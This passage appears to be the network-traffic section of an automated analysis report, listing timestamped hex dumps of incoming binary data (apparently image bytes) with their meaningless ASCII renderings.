                                                                                                                                                                                    2023-01-05 07:58:10 UTC5574INData Raw: 6d e0 87 8e 32 42 48 36 b9 40 0f 52 62 26 97 12 39 17 88 a7 29 ea 6d 7c 87 8b 4b 6f 6f a3 ea 7a 96 b7 54 6b 7d 18 2c da 8a b5 a2 56 90 89 9c f1 6b 94 d9 cc 14 f4 30 1c 9a ec ae be 8a 3f e6 68 9c 97 99 52 a4 b0 8c 69 03 3c 41 87 40 e3 c0 86 fc 14 d2 b5 94 41 70 60 3d 53 b5 ec 92 e7 bc 59 45 53 3a 40 dd e2 8c 43 34 64 8e cb 55 87 6f bc df cd 6f 36 b2 5a 15 de 70 c8 b6 08 db 5f a5 40 68 31 b3 fa 91 82 c7 26 30 28 ca 3f f5 3f d4 f7 db 5b 5b 52 ab 48 8a e4 cc fa bf 65 c0 8b 76 8f 22 46 93 fb 5c b9 11 ae 68 4a 02 d4 ac 50 65 ab d2 8b 79 36 64 db d6 9c da ea d8 d5 94 12 94 1a ad c3 d3 50 65 ee 4f 93 b4 e1 47 db b5 51 82 c8 ad 56 14 b6 96 b7 6a db 57 de bd bc da e2 f8 f3 82 d9 93 97 6e dd 76 79 65 cb d8 6e c6 c2 c8 78 c4 d1 da a6 b4 3f 9f 1a 1b b8 f3 6b 54 dc 01
                                                                                                                                                                                    Data Ascii: m2BH6@Rb&9)m|KoozTk},Vk0?hRi<A@Ap`=SYES:@C4dUoo6Zp_@h1&0(??[[RHev"F\hJPey6dPeOGQVjWnvyenx?kT
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5622INData Raw: 5e 0d ee 3e da 6b d3 d0 fa e4 ce d9 36 38 b9 0d 91 12 ca d4 b8 f8 d3 c3 81 d7 d0 6b b7 65 27 9b 75 0c ff d0 db 6b e8 8f 0c 34 c6 1a 00 34 08 34 00 68 00 d2 00 d0 30 d3 10 68 18 68 10 68 00 a6 81 8b a0 04 d2 00 d3 00 d0 01 a0 03 40 85 d2 00 d3 00 d0 02 68 18 68 00 3a 00 5d 00 26 80 17 48 41 a0 03 4c 03 40 c3 48 42 d3 40 c4 a6 80 14 68 02 56 e3 ea 34 db b6 ce c4 71 5e d2 1b 1b c6 a6 ef 1d 7c f7 f9 05 6a 3e ff 00 72 3d 5d 17 51 01 e9 0d d9 b7 e8 e6 53 05 cd 05 aa 45 c5 94 03 ef 2d 2d 47 e5 ea ea d7 8b 4d ab 64 c2 3a ea cb 70 cb 8a cb da b5 96 25 92 40 ca c2 b5 f3 f1 26 fb 47 fb ba e9 a3 8e 06 cc cb ef 98 d1 1c 6c 71 90 a9 2d c4 90 be 7f 8d 9f c8 d7 74 dd ae 85 65 83 26 c9 0d 1b 03 42 6f 62 49 3f f8 ff 00 dd af 67 4e f4 a2 a7 06 dd 4d e4 f1 af 44 e2 0d 00 26
                                                                                                                                                                                    Data Ascii: ^>k68ke'uk444h0hhh@hh:]&HAL@HB@hV4q^|j>r=]QSE--GMd:p%@&Glq-te&BobI?gNMD&
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5646INData Raw: dc 1d c1 2a aa cd d0 aa ad 4e 64 45 e6 7f 7b 5a 57 c7 58 6f 92 4d 0e 44 51 77 d7 bd db 22 97 2b b3 5a a4 2d 0b 2d fe 15 d6 8e 19 46 01 71 25 df 72 c7 62 46 19 13 12 f1 b9 0c 42 a2 b7 2b 35 ab c9 d5 f2 f5 e6 bd 5f 27 00 f2 5c e4 fa 57 32 29 53 04 d8 d0 4f 98 c2 e7 34 a8 03 b9 dd f8 6d 7e 9f e1 d6 1a 75 5e b7 8f ff 00 a6 df fe ac 38 83 7f 91 88 99 61 63 62 cd da 65 7e 5e 15 65 f3 3b 7b 87 cc ba f6 d8 cc fc bb 9e 39 c7 93 3a 75 26 36 73 1a a1 f1 62 ac 56 e5 55 f2 87 ff 00 8f 5c fd 97 dc c3 f4 32 fe a4 f5 66 1e 16 0f f6 c2 ac 9f 52 a5 a6 32 44 6d 05 4d d1 f6 5c f3 3f cc eb f7 7e 1d 67 7b 75 50 bd 49 6e 49 91 e0 49 87 99 8b 93 89 8d 14 d8 f3 32 ca f3 b1 a4 2a ad ee 70 79 18 f1 e6 b5 75 b2 51 e8 21 df 53 e4 ac fb ae 21 8d 0a fd 3f 74 b1 b6 df 96 40 b4 06 3e 5d
                                                                                                                                                                                    Data Ascii: *NdE{ZWXoMDQw"+Z--Fq%rbFB+5_'\W2)SO4m~u^8acbe~^e;{9:u&6sbVU\2fR2DmM\?~g{uPInII2*pyuQ!S!?t@>]
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5669INData Raw: af 00 3d 26 e2 f9 18 c8 8f 12 c5 2a b7 3c 84 1a 1e 14 b1 3e 1f e5 d7 77 8f b1 d5 cb 30 d9 5e c8 af cd ca 18 4e 89 3a b2 f7 a8 63 6a 55 48 27 8f 87 d9 ae ad be 75 75 b8 39 2b a1 bc 9a b8 16 68 70 a5 c2 40 92 32 d4 ad 78 03 77 b2 b4 d7 17 95 b1 5d ca 3b 74 d7 aa 83 13 eb 3f 4e 66 6e 59 89 bb e5 db 90 98 91 82 b8 fc 00 75 5e 77 45 5f 22 57 ab df b7 5e 26 de cd cf 26 d0 3d bc 7a b3 0b 78 d8 9a 5d a3 20 09 16 38 a4 94 46 41 64 0e 6c fa 77 e1 c9 25 de 4f 83 5a 6d bf b7 05 54 cb fa 5f d0 b9 db ea e2 ee 92 b0 7c 6c b1 2f 7d d8 b3 39 f1 09 78 24 79 93 b7 c8 79 35 9d 75 3b e5 90 8e a1 b1 7a 6f 1b 65 8c 62 6d f0 88 9e 79 44 8f 52 69 77 42 d9 f1 72 eb 6b 57 84 8d 16 0a a5 cb 8f 37 71 92 3c 69 2b 14 4c 6f 0f ed 00 f3 32 d7 ca a7 9b 5a 4f 67 82 59 53 bf ee 38 79 f9 b2
                                                                                                                                                                                    Data Ascii: =&*<>w0^N:cjUH'uu9+hp@2xw];t?NfnYu^wE_"W^&&=zx] 8FAdlw%OZmT_|l/}9x$yy5u;zoebmyDRiwBrkW7q<i+Lo2ZOgYS8y
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5701INData Raw: 58 c3 fa 1e ea f9 75 2a b3 c1 2e c5 de 46 e1 2e e4 b1 4c 91 db 21 50 0b 54 1b 9b c1 88 fd 9a f2 7c ab a7 61 b2 d7 63 f4 d9 ca c3 6c b9 27 8a c8 d9 59 90 37 39 a1 e6 5e 1e 16 8b 9a dd 46 bd 73 ee f4 43 aa 17 37 78 97 73 99 b6 ed 8a 5f 19 48 57 91 ad e1 4a dd 5f 0b ad ea 45 fc 3a d6 d7 cc 22 a4 bb da b1 30 f3 f1 cc cb 21 9b 0e c2 a1 e8 56 51 2a 9e 65 8e 2e 63 f7 7d ed 74 aa 55 56 5f b9 7f d4 34 5e 60 2a cb 24 69 87 b6 1a 01 4e f4 83 b6 78 2f 3b b5 dc df c2 9a 2a 93 78 af f5 7d a5 22 ca 6c 15 cf dd 50 a9 8b 23 bd 1f 4f 8a 90 39 99 7d d6 a2 db ae c7 45 77 9c 8a 60 c4 4d e9 4c 4c ed da 36 87 22 4c 78 a3 95 9d 63 65 57 ed 95 6f 94 88 3a 7b 4c de 66 d7 06 bd 4a b7 85 ed 13 37 1b b6 3e 36 65 26 cb 8f bd 91 8c 7b f6 5d 5a d8 a7 91 c0 be d5 94 79 75 d5 ba aa dc fb
                                                                                                                                                                                    Data Ascii: Xu*.F.L!PT|acl'Y79^FsC7xs_HWJ_E:"0!VQ*e.c}tUV_4^`*$iNx/;*x}"lP#O9}Ew`MLL6"LxceWo:{LfJ7>6e&{]Zyu
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5749INData Raw: 3e 44 d9 cf f7 7d eb 70 d8 24 83 1d 27 21 d2 35 30 f6 98 18 5a ee 7a 07 4f ce 95 af e7 59 ed e6 d5 57 5b 58 26 48 fe 9d f5 28 9b 2b 76 de 72 23 a6 54 cc a6 22 a0 00 8e 4d b6 af bb ca be 5e ad 3f 21 aa a8 f5 0e c6 f3 d0 d8 2d 06 ce 5f 32 b6 64 e5 90 cd 6f 55 15 58 de de d1 75 cb a7 e3 e6 bf f1 29 13 bd 63 2b 3e e1 8f 85 33 2b c2 e8 df 4b 1c 31 51 54 8e b5 6e d8 b3 cb e7 d7 7b 50 26 59 6c f1 45 14 32 34 b1 25 f9 01 5e 3b ab d5 4b 3b 4f e5 0f 45 bd 53 f8 b5 9f c9 9f f5 29 54 f5 ba 64 3c cb 85 00 84 09 d6 e6 0e 94 b5 18 90 ab fe ce a6 5d 25 66 e0 70 63 bd 67 b5 4b bf f6 0e 2c 92 ac 58 9d c3 9a c8 6c 55 89 4d 64 65 53 f3 25 74 ea b7 dd d6 9d a7 83 36 8d d6 d7 b9 e2 0c 58 16 29 52 5e f4 0a b0 c8 41 35 1f eb 32 8d 43 b4 61 ff 00 c0 d1 22 1e 5e 49 ed cd 3e 6e 44
                                                                                                                                                                                    Data Ascii: >D}p$'!50ZzOYW[X&H(+vr#T"M^?!-_2doUXu)c+>3+K1QTn{P&YlE24%^;K;OES)Td<]%fpcgK,XlUMdeS%t6X)R^A52Ca"^I>nD
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5805INData Raw: 19 56 be 4e 2d 25 8e 40 b4 b1 ea d6 c7 77 dd 37 7b ac ad a8 58 c9 49 1a e6 7f ed 05 de c4 ee 42 59 c8 88 54 35 e6 ee 64 1c d7 f3 7e 2d 4b 7d 4b 4a 4a fd d7 26 3c 8c f3 b7 a3 a9 82 18 dc 18 f8 dd dc 60 7e 67 81 55 e6 e9 5f 87 55 2a 61 09 f0 73 3c 9d cf 1a 55 86 78 ad c8 2b 25 ac 23 20 82 c0 15 e6 b7 a6 8d e6 d3 f4 31 64 90 91 36 46 44 32 2a d8 aa 1a 92 00 79 58 0b ad 57 e5 2c 87 aa dd 38 10 fc 6b 72 18 13 f2 9c 52 a7 9a 33 77 d8 bf 66 a7 66 6b 08 69 15 53 7a 2f bf ea cc 4c d9 70 57 27 0d 9d 0c b0 16 0b 7a 94 36 4b cf d7 15 57 b9 6b 7b ba cb c7 9a 2e ac b8 3b 96 e7 89 f5 10 b5 cd 57 36 85 50 0d 01 03 87 2f dd d7 45 ad 0b f7 15 12 51 cf b1 e3 e2 40 54 48 d3 46 e5 49 66 36 80 e7 c8 b6 f3 5b 6e 8a ac 72 26 8c d7 ea 46 1e db 81 1c 7b 8e e5 96 e7 23 1d e1 fa 75
                                                                                                                                                                                    Data Ascii: VN-%@w7{XIBYT5d~-K}KJJ&<`~gU_U*as<Ux+%# 1d6FD2*yXW,8krR3wffkiSz/LpW'z6KWk{.;W6P/EQ@THFIf6[nr&F{#u
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5876INData Raw: db bf 4e 36 fc 68 1c ce 64 59 1a 24 8d 9d 9e e3 1b 15 e7 78 65 3c df c5 e5 d0 e8 b9 1a 45 fe 0e 3e 26 ce 86 28 91 40 c9 00 80 bc 2b 68 08 1b 87 4a 9e af bd cd a2 a9 2e 0a 13 3b 7c c7 c4 86 e9 18 46 a5 78 90 18 f3 13 68 5e 41 fc da 4d c7 25 1c f3 f5 47 77 c8 db 76 ec 18 b1 b2 09 6c b6 90 b1 42 2c 68 a8 28 24 a7 57 36 b9 2e fa ae 79 ff 00 b4 1d 8d 17 e9 44 19 58 9b 14 6d 96 44 8a cc 5a 29 55 c1 01 58 f0 07 80 b2 9c da bd 6e 2a 2a e4 b7 dc 25 29 04 b9 2a 92 2d cc a0 b0 15 3c c6 d5 6f dc 58 ea ec ca 22 e4 6f b8 52 b3 e3 64 c9 6c 18 e8 5e 79 98 10 4f 2b 55 7d ea 0d 0a eb ed 62 67 2d c9 ca d9 f7 09 e2 c6 db 91 da 0e d8 55 32 f2 a9 f6 db 7a d6 d7 3f f3 35 c8 e9 59 c1 0d 93 e4 8a 3d af 6e ca c2 0c a9 8f 34 52 00 6b 56 be 9e ca eb b3 5d 7a 92 62 7f 4d 36 e8 77 b1
                                                                                                                                                                                    Data Ascii: N6hdY$xe<E>&(@+hJ.;|Fxh^AM%GwvlB,h($W6.yDXmDZ)UXn**%)*-<oX"oRdl^yO+U}bg-U2z?5Y=n4RkV]zbM6w
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5900INData Raw: 0f f4 23 7a 6e 4c 63 ba 7d 4c 51 81 99 93 6a c9 1c ec 02 ad 80 b0 b1 17 9a 3a 74 f2 6b d0 4d c8 49 a8 f5 d6 e2 1b 06 3c 7d c2 38 da 4c 91 40 41 26 48 e8 eb 72 43 ff 00 a9 ca b7 75 6b 9f c9 b4 a8 e6 d6 ff 00 a0 a6 8c 5e 5e d0 bb 4a 67 6e a8 a9 1c eb 19 ac 6a a0 93 32 9f eb 3d 5a ff 00 f4 d9 2d 5d 6f a7 4f b6 2d f8 91 30 68 3d 3d fa 6d 2e e7 8c ab b9 e4 d9 88 ac 25 8f b2 38 bc bd 72 49 29 fb fc b1 a7 bb ae 95 a7 23 59 37 db b6 2e 26 51 58 9f 12 10 1a e6 7a 20 07 80 b0 04 fd f4 e6 d6 b6 aa 7c a1 c1 e7 72 d9 23 dc 96 2d b2 d0 8b 18 54 a1 e3 6a a7 1a 7d a2 e5 e5 d5 b5 38 11 c8 ff 00 5b f6 47 81 a2 c4 da 60 91 e2 ca 60 00 46 05 01 03 99 64 e3 f2 ee 6e 64 0d a5 1d 58 99 cc b6 9f 47 67 6f f9 4f b7 60 c3 2e 4e 7c 69 42 89 68 45 0a 79 af b8 af 2a f4 f5 ad cf a3 b3
                                                                                                                                                                                    Data Ascii: #znLc}LQj:tkMI<}8L@A&HrCuk^^Jgnj2=Z-]oO-0h==m.%8rI)#Y7.&QXz |r#-Tj}8[G``FdndXGgoO`.N|iBhEy*
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5995INData Raw: 6e ff 00 49 7d ed 66 df 36 fa 12 d4 11 f6 13 b9 7a 8a 5c 1c 4c c0 99 58 f8 c8 ea eb 53 74 82 ab 6c f2 c6 fc 92 59 6d aa be 5e bd 61 f2 bd 8d 46 41 1d 0b 09 b1 b6 d8 fe 9b 14 0e d9 25 8c 63 c0 71 ab 53 e1 fb bc ba e8 5e de 3f da 50 ce e3 9b 8c 16 3c 24 28 cf 32 03 ce dc 8a d4 b8 33 fb 35 4d a5 cf e4 05 27 f7 81 84 11 77 16 53 08 72 44 81 c7 66 80 71 a3 1e 16 d6 dd 13 88 64 96 f1 fa 7f 1f 7a 09 3e e6 83 20 48 cb d9 61 50 55 49 0f 6d f5 ad 92 79 bf d4 d2 6a 79 19 94 f5 96 e3 b7 49 b3 3a 23 c7 04 f1 4a 8f 04 6d 20 a9 68 e4 e7 91 3e 1b 6f d7 1e ce b6 42 6c 99 83 b8 e3 ee 82 0c 3c 9c c2 66 11 5f 24 6e e6 34 b4 da 7b 7d c5 a0 57 3e cb 35 bd 73 19 04 e0 e6 5e a3 f5 56 cf 1e eb 94 8b de 18 0b ca 54 b1 92 c6 61 77 6e 3b c9 e9 7e ab 1b fc ba b4 a4 cd b2 36 c1 ea 68
                                                                                                                                                                                    Data Ascii: nI}f6z\LXStlYm^aFA%cqS^?P<$(235M'wSrDfqdz> HaPUImyjyI:#Jm h>oBl<f_$n4{}W>5s^VTawn;~6h
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6246INData Raw: 24 29 b6 36 9b dc 16 f4 a2 fd f7 d6 54 f0 aa a9 16 29 dc b6 dc 84 56 f6 b6 c3 20 9e 62 04 88 ed 54 bd 4d ca c8 94 ba ce 6f bb af 37 c9 d4 b5 e2 b3 fc a6 a9 b6 88 18 bf a6 b9 85 b2 32 31 f2 23 39 a2 8c f8 ac 0a c5 2d 7c dd c5 6e 0e 7d eb 7e fa eb 5a 6b 6d 43 08 31 39 c3 37 32 36 8e 3c 73 1c f0 27 d4 15 a2 86 78 47 9f 87 57 69 bc cb e5 d6 94 a9 9d aa 6d bd 1f 38 d8 36 b9 f3 77 3c 27 53 34 4a e6 46 60 43 97 a0 89 62 1d 48 d1 5d 73 fb ba da 96 55 04 89 9b 4e f9 0e 6e 3c 73 63 09 8a 29 64 62 d5 6e 20 ff 00 51 fc da e8 a5 c4 6b f6 7d cb 0b 2e 1e ce 43 35 2a c6 83 c1 89 fd fe 6d 5b d5 d8 b5 68 17 76 9f 6f 82 36 97 bb 91 1f 6d 0b 1e d7 3c 80 8b 40 68 d7 98 37 c5 72 ea 7e 25 4c 8f b4 93 b6 08 23 4c 18 73 22 be 71 1a 96 59 64 a3 b5 1b 9a e5 72 be 6f bb ac 2e f1 25
                                                                                                                                                                                    Data Ascii: $)6T)V bTMo721#9-|n}~ZkmC19726<s'xGWim86w<'S4JF`CbH]sUNn<sc)dbn Qk}.C5*m[hvo6m<@h7r~%L#Ls"qYdro.%
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6302INData Raw: dd c2 8f 20 cd 28 8e f0 61 42 c8 a7 8d c8 64 f6 36 b2 b6 d5 5e 58 36 52 ee 9f ab 18 9b 04 38 c7 14 ae 5e 64 bc 5d 94 10 f0 d5 39 6e 8e 55 55 7b a5 b7 e5 ab dd e6 d2 ae c5 13 39 06 ce 73 96 f9 03 08 ee 53 19 e1 96 69 00 72 f1 10 ad 79 e6 65 6e a4 2a dd 11 db f3 7d fd 71 42 64 b3 65 b6 6d d8 9d b9 71 61 dc b2 93 29 e4 8e 8e 5b b6 a6 32 41 ee c9 03 7b bc fe 6e ad 5d 2b 58 6a 40 d0 6d 3b 34 23 72 69 76 cc 99 44 0a 96 3a 06 a8 99 ee e5 98 f9 41 ff 00 36 bb 29 a9 2c d5 8e 4d 16 df ba ae ed 1e 46 2e d2 f1 cd 34 4a 38 ab 71 46 1e 21 ad bb 9f aa e5 f7 74 65 f0 59 8e fd 4a f5 9c 1e 96 c9 87 66 c8 c3 8e 7c 99 a3 8e 49 a6 af 10 4d fc aa 0a f5 5d 6f 57 93 4e d5 49 65 7b 88 76 31 cd eb 98 73 b2 54 6e ce b8 72 c6 d6 33 c2 84 45 44 e0 95 54 bd ee 7f 36 b3 4d 58 cf b1 03
                                                                                                                                                                                    Data Ascii: (aBd6^X6R8^d]9nUU{9sSiryen*}qBdemqa)[2A{n]+Xj@m;4#rivD:A6),MF.4J8qF!teYJf|IM]oWNIe{v1sTnr3EDT6MX
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6309INData Raw: 6d 48 09 12 36 66 13 c0 72 11 5d 64 e6 11 cc 03 23 57 e5 db 34 6d cb f7 7c cb d5 ac 23 e8 12 6e 5e 71 0c a3 11 82 a0 92 8b 19 03 cc 7c aa ab cd ab a2 f4 06 65 fd 4b ea 49 cc 2d b4 87 92 f8 5e 92 97 a0 37 a9 e9 b3 d9 67 bd 77 e1 d3 69 a7 92 64 c8 8c 95 e4 93 2e e9 62 8c 50 21 26 83 fc 17 f6 eb 44 84 3d b7 cf 90 b8 c1 44 84 21 75 34 52 43 54 0a ab 5d f6 71 e5 f8 b5 36 81 9b 2d 83 d4 41 9e 15 dc 95 f2 67 91 8a 2b 19 08 66 f6 2a 9f 37 57 9d 79 b5 9e 39 2d 15 f3 fa 27 3f 75 dc f2 b6 f7 89 b1 b2 f1 d4 c9 57 53 11 9d 07 f4 c7 0b 5e 5b bf ad ad aa c6 d1 3f 6a fd 12 cc 9e 09 27 ce c8 8f 1a 40 ca 15 14 5c 82 aa 1e d7 7e 56 ee 27 4b f9 75 ac 88 f0 df a5 b7 85 86 3d c2 25 ed ac cf 2c c6 bd bb 96 82 08 d6 3a 82 b2 7e 62 bc 9e 5d 66 da 90 26 e0 ed 1b 3e cb 88 70 f2 5a
                                                                                                                                                                                    Data Ascii: mH6fr]d#W4m|#n^q|eKI-^7gwid.bP!&D=D!u4RCT]q6-Ag+f*7Wy9-'?uWS^[?j'@\~V'Ku=%,:~b]f&>pZ
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6397INData Raw: db 86 14 d1 6e 11 48 f9 12 1e e6 3c 8a ed 42 aa b4 2a b1 29 b1 6f 7b 7e 6b f9 34 9d 8a 2b f1 3d 04 64 c8 8e 39 e4 61 8e f1 97 25 29 7d e1 6e ed 28 7e 5e af 36 a1 ec c1 68 d7 a7 a6 76 98 16 38 16 00 c0 a2 9a 5d cc cc 07 4d 47 3d 5b 9a ff 00 bb ac 1b 63 c1 5d bf fa 7f 6a f4 be 36 3e e0 b8 4d 3a 64 5e 3e 7d 0a 5c 38 85 87 99 9a d5 5e a3 6e b2 b2 be ce 1f 51 59 18 1c 49 c7 78 04 74 81 59 b8 bb 83 6a ff 00 dc c4 fd dd 77 c6 20 52 77 9f 48 fa da 38 f6 ec 4c 1d eb 18 b3 ae 2c 81 0b 33 1e f3 dc 3b 1d c5 6f ca 4e 3c ea ad c9 af 25 5e b6 7d 57 bb a9 aa b0 d6 7f a6 e6 de 31 3b b2 a2 ae ed 92 a6 3b 21 27 b7 46 60 b1 a2 2b f4 2f fa ae dd 2b cd ae b8 4b 82 5e 4a bf 48 7e 8f 66 c9 0c db 93 38 8f 2e 09 8a f6 9d 09 82 58 d4 db 70 7f 19 23 9d eb 6c 89 d1 a6 ae 3e a6 93 d6
                                                                                                                                                                                    Data Ascii: nH<B*)o{~k4+=d9a%)}n(~^6hv8]MG=[c]j6>M:d^>}\8^nQYIxtYjw RwH8L,3;oN<%^}W1;;!'F`+/+K^JH~f8.Xp#l>
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6437INData Raw: e5 d7 4d 1c 99 b7 06 a7 f4 8f d1 91 6d 50 e4 6e 79 25 67 13 30 8d 17 98 04 2b d4 de 36 93 cd ee e8 99 28 ff d3 e9 c2 9e 07 88 d7 b1 7a f6 50 79 95 b4 39 10 22 21 3d a5 08 a4 93 41 fb 75 1a f5 aa 28 45 5e fd 99 5f bb 60 2b 87 c9 8e 37 92 77 b4 35 a6 9c a3 de fb 57 db af 3f c9 d5 ee ec 75 ea b4 a8 39 87 ad 76 e1 dc 95 a8 6e 20 d3 98 10 a4 7e cf 2d fa f3 76 22 d9 9d d9 7d 1d 9d be 46 f0 6d a8 19 62 1d c6 24 d0 16 3d 29 7f bf 4e 8d 3d 5a ad b3 83 37 68 2f fd 39 91 bb 7a 77 1f 27 03 7a c2 c9 c9 c6 aa c7 00 02 aa ae a5 a8 b1 b7 ba 7a 95 93 5a bd 0f d5 14 b6 21 c4 f4 a3 6c d3 e6 4c ea 64 c8 11 5e 91 32 de aa 5b 99 ab 2f 9a 48 fd de ad 16 d3 0b 22 ed 27 8f 44 6e fb b6 3e e7 8d f4 92 bd a1 d6 e5 45 2d 70 f0 66 68 47 52 22 f3 36 b8 15 dc c2 35 a9 da 63 da e6 39 0b
                                                                                                                                                                                    Data Ascii: MmPny%g0+6(zPy9"!=Au(E^_`+7w5W?u9vn ~-v"}Fmb$=)N=Z7h/9zw'zzZ!lLd^2[/H"'Dn>E-pfhGR"65c9
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6488INData Raw: 75 ce 3b 06 f1 97 90 c1 a7 9e 64 8c 23 b1 00 22 0e 6b 15 07 2b 5b d3 ad fb 19 9d 1f 69 f5 56 52 61 50 aa f6 9d 14 32 d4 db 43 c7 fe cb e6 d6 9d b0 07 ff d5 e9 ba f6 cf 28 34 00 ba 00 2b a0 03 40 06 80 0d 00 48 c2 ca 38 cf dc 02 a6 94 d6 3b 75 f7 50 6b ae fd 44 de 1f 2b 27 11 a4 c3 7f fa 87 60 24 2d c1 40 6e 5e 6e 0d cb f7 75 e3 ef f1 9a c2 3b eb b2 54 9c 9b 72 f4 eb ed 49 36 3c 90 71 c8 75 61 2a 71 31 80 79 95 3e ff 00 97 5f 3d b3 4d a9 6f 77 a1 4b 23 fb 5e da 46 26 4c 58 d9 59 50 2e 7b 35 56 39 40 2e 17 97 8a 35 d1 fe 25 b7 5d 7a ad 81 c1 96 8f d2 1b 6e 2c 91 e1 ef 2c d8 dd e5 06 2a c8 a2 d8 c7 9e 49 98 18 d0 fc 3a d2 b6 b4 92 67 b6 cd bb 33 1e 3c ac bd b9 04 bb 6a bf 6d cb 30 e3 53 55 e6 a7 16 5f 7d 75 ae c6 ad c8 17 18 3e a5 8d 23 59 b7 88 26 86 28 eb
                                                                                                                                                                                    Data Ascii: u;d#"k+[iVRaP2C(4+@H8;uPkD+'`$-@n^nu;TrI6<qua*q1y>_=MowK#^F&LXYP.{5V9@.5%]zn,,*I:g3<jm0SU_}u>#Y&(
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6552INData Raw: ef 4f cd 83 2c 2b b7 26 54 8c b5 56 16 ab 86 a5 b1 fc e2 57 b6 c1 bf fa 75 9f 54 bd 06 72 68 3f 4c 18 c7 8c 32 bb d0 4e 62 66 ca 8d 93 8a 10 f6 22 a7 d9 74 3c f7 6b 36 9a 23 a9 25 fd 0d 8d b1 ee 13 49 8f 34 93 c5 90 e2 2c 57 e2 1a 38 88 ab 77 bc 8e a2 4e 9d 6d e9 02 64 b8 72 04 93 43 26 1c 22 66 42 c8 b3 56 a0 94 eb bf ef 5a 79 7c ba 50 23 37 eb 3c 29 72 f0 e3 8b 20 94 0d 3c 8f 1c 40 80 8d c2 e9 24 67 f7 d4 1e 44 e9 d5 55 b4 10 73 78 66 8c 55 55 79 ab c0 9a 52 83 de 5d 74 c0 0d cb da 8c 87 55 06 bc 08 1e 1a 70 21 fc 4d c9 71 41 45 89 18 31 a9 3e 07 f7 5d ac af af b1 30 4e 4d e6 7c b9 17 e8 42 61 b2 71 be 22 c1 ff 00 65 65 ba ef 1d 2d 73 a7 32 c9 75 4f 93 b0 27 ea 6f f7 a3 06 df 2f 73 12 17 4e dc 99 0e 0b 47 2c 96 d9 da 69 22 ed bc 4a dd 72 d8 dd cd 74 ed
                                                                                                                                                                                    Data Ascii: O,+&TVWuTrh?L2Nbf"t<k6#%I4,W8wNmdrC&"fBVZy|P#7<)r <@$gDUsxfUUyR]tUp!MqAE1>]0NM|Baq"ee-s2uO'o/sNG,i"Jrt
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6568INData Raw: 64 77 e6 20 0b 6d f0 e6 5f 87 51 6c 38 fc 4d aa b0 34 63 30 c5 22 c8 ac af 0c b1 7d 3c 70 c7 52 29 ef c9 d4 f1 4a bd 57 74 69 48 cf 39 db 56 37 f7 1c 2c d9 25 cb 8e 63 69 8e 34 24 a5 41 2b 27 7e 3f 3a 5f f1 5c 9d 6b ad 5b 84 24 8d 06 76 d7 8d 9f 82 f0 c6 89 18 92 47 76 a7 0a d4 73 db 4f fb f5 82 52 8b e0 cf 7a 97 6f c1 dd b6 39 15 26 11 85 b4 46 aa ca 43 3a 1a 52 6e a9 17 f9 6d d6 16 aa b5 67 80 7c 99 8f 56 6d d8 b1 e3 e0 c1 31 33 64 30 65 66 42 2d 41 45 08 83 e2 fb dd 5a c3 e3 75 f5 0b 43 20 46 b1 e2 2f d2 c2 58 cb 08 1c 8e 4d 7f 19 1e 5f 73 5d 34 32 63 b8 f8 88 26 ef 09 02 12 6f 37 31 6e 6a 04 54 88 7f 4f ff 00 36 ba 24 46 4f d5 70 ec fb 5e f3 fd ef 3b 16 76 ee 4d 56 8c 82 40 a2 d8 e1 df f2 c4 92 75 27 c5 6e b7 a3 4f 92 5f e8 64 f6 38 f1 b7 24 18 90 ac
                                                                                                                                                                                    Data Ascii: dw m_Ql8M4c0"}<pR)JWtiH9V7,%ci4$A+'~?:_\k[$vGvsORzo9&FC:Rnmg|Vm13d0efB-AEZuC F/XM_s]42c&o71njTO6$FOp^;vMV@u'nO_d8$
                                                                                                                                                                                    2023-01-05 07:58:11 UTC6612INData Raw: d0 c7 fa eb 75 c1 fa 5c 98 60 fa a6 ce 92 54 ed 4d 1f 2a 92 0d b2 48 ef 77 72 cb 6e 8f a7 9f 59 b6 96 49 b3 29 36 1c 67 5c cd 90 c7 71 cb 49 58 15 97 d8 82 e5 93 ab c8 c9 ae 6d 76 6e d2 be d2 2a 6e 07 a6 ff 00 b3 63 64 e7 ed a8 06 43 56 56 59 39 03 a4 64 bf 2f 1e 59 7a ac f7 b5 a7 68 70 6d 18 93 0b ea 4f d4 29 b3 44 59 12 47 dc 06 55 9d b1 d0 91 1d aa 3b 69 1f b5 ff 00 e6 49 77 2d fe 5d 4e bb cb fe 13 0b 5a 4a 3d ef d4 b9 1b a4 b1 f6 61 38 d1 8a a8 48 c9 0e ca fe d9 0f 2f 72 df 22 eb aa d6 51 83 39 1d c1 cc fa 6c 29 e0 74 ee 19 5d 63 be 42 41 02 87 d8 dc 6f fb da e6 b6 bc c9 52 67 1f 3b 27 6d cc 86 5c 65 0b 3e 31 62 2e 15 04 91 6f 11 f6 5b ae 8a 12 59 fa 40 b4 ed 32 93 7a 22 b6 41 46 f1 63 5b 59 13 8f 9a ed 54 49 48 df 41 b6 43 bd 61 cd 06 ec a6 4c 56 88
                                                                                                                                                                                    Data Ascii: u\`TM*HwrnYI)6g\qIXmvn*ncdCVVY9d/YzhpmO)DYGU;iIw-]NZJ=a8H/r"Q9l)t]cBAoRg;'m\e>1b.o[Y@2z"AFc[YTIHACaLV
